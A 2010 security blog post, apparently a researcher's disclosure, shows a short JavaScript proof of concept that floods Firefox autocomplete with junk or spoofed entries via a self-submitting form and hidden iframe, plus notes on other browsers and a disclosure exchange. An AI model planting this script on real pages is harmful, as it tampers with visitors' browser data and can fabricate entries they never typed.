Thursday, July 29, 2010

In Firefox we can’t read auto-complete, but we can write to it (a lot)!

This is not exactly security related, just a really really annoying abuse case that takes advantage of auto-complete functionality. During my research I tried dozens of different methods attempting to get Firefox to allow an arbitrary website to read the data, but to no avail. Clearly the Mozilla development team was on top of their game. However, just because we can’t read auto-complete data, doesn’t mean we can’t write to it... and en masse!

All you need is an iframe, a text field with arbitrary data, a form that posts to that iframe, and some javascript magic to automatically submit the form. Like so...

<* script>
function fillAutoComp() {


// random data, nothing important

var num = Math.floor(Math.random()*1000000);


// set some arbitrary data to the text field
document.getElementById('data').value = “Spoof-” + num;

// submit the form, over and over and over again

setTimeout("document.getElementById('me').submit(); fillAutoComp();",2);

}

<* /script>


<* form id=”me” method="post" action="/" target="my_iframe">

<* input type="text" name="data" id="data" value="" size=140>

<* input type="button" onclick="fillAutoComp()" value="Start">

<* /form>


<* iframe name="my_iframe"><* /iframe>



Here’s where it gets a little bit more interesting. Firefox saves 200 characters of auto-complete data per entry and allows 100 text fields per form. While this might add up, th amount of data is no where near enough to fill up a hard drive before a user leaves the page. However, Mozilla is working on a fix just the same. What you can do though is annoy a users by littering well-known auto-complete entries, like "email," with loads of surrounding crap data. If one were so inclined, you could also make it look like someone searched for something, or has an alias, that they didn’t type by spoofing auto-complete data. You get the idea.

I attempted the same technique on Safari and Chrome. While it technically works, success was mitigated. In Safari, auto-complete data is site specific. Chrome restricts the number of auto-complete entries. Internet Explorer, no success.

2 comments:

Wladimir Palant said...

The bug you are linking to is marked as security-related - only few people have access to it. Given that you already published this issue and severity is low anyway, could you suggest opening the bug?

Jeremiah Grossman said...

@Wladimir: Good point. I got an OK from Mozilla to post my details at BlackHat on this one. I didn't post it to Bugzilla though, they did. They'd have to open it up.